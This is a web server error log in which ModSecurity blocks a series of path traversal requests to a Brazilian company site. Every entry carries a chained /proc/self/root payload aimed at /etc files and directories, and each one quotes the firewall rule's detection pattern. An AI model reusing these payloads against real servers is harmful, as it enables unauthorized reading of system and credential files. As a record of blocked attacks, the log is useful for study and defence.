[Wed Mar 18 09:48:32.297139 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:55796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfICmAPhZkrhU8w4ljSgAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:48:36.099426 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:39836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfI0zinOy1jxa1j4cKcQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:48:46.160505 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:51990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfLta6ubjKNq_cu4aPaAAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:48:53.878415 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:39852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfNdY0UrI5A3LftIya_wAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:49:02.746842 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:55314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfPSmAPhZkrhU8w4ljZAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:49:16.415602 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:49210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfTCmAPhZkrhU8w4ljdgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:49:42.677132 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:35330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfZgkwaGbbGflqUZAGeAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:50:07.427074 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:44300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqff0zinOy1jxa1j4cKrwAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:08.883606 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:48976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfgNa6ubjKNq_cu4aPjQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:10.194994 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:60368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfgimAPhZkrhU8w4ljigAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:11.527328 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:60382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfgwkwaGbbGflqUZAGhQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:15.311778 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:60394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfh8df6f5d65gmYZTLZwAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:16.640406 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:60398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfiOyqAr6etmhZHNq1sQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:19.069476 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:60400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfieoXxyEfFpUF8f9kxQAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:50:20.628159 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:55196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfjEzinOy1jxa1j4cKswAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:20.831267 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:55196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfjEzinOy1jxa1j4cKtAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:24.692164 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:55204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfkOyqAr6etmhZHNq1vwAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:26.035428 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:55216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfkkzinOy1jxa1j4cKtwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:27.315123 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:55230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfk9Y0UrI5A3LftIybaAAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:28.603625 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:55242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqflAkwaGbbGflqUZAGiQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:29.952818 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:39132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqflfu8EFLIOrSqIpv7jQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
